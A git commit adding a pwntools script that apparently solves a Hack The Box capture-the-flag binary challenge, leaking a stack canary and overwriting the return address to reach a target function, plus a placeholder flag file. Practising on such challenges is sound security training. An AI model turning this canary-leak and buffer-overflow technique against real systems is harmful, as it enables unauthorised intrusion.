changed repo structure

This commit is contained in:
2025-06-06 02:50:04 +02:00
parent e887de976a
commit 6e6ee357b8
8848 changed files with 2089898 additions and 9 deletions

View File

@@ -0,0 +1,21 @@
from pwn import remote, p64
NEEDLE = b'Quack Quack '
LEN_NEEDLE = len(NEEDLE)
with remote("83.136.251.145", "32656") as p:
p.recvuntil(b'> ')
p.sendline(b'A' * 0x59 + NEEDLE)
canary = b'\x00' + p.recvuntil(b'> ')[LEN_NEEDLE:LEN_NEEDLE + 7]
assert(len(canary) == 8)
exploit_string = (b'A' * 0x58) + canary + p64(0) + p64(0x40137f)
print(exploit_string)
p.sendline(exploit_string)
p.interactive()

View File

@@ -0,0 +1 @@
HTB{f4k3_fl4g_4_t35t1ng}

Binary file not shown.

Binary file not shown.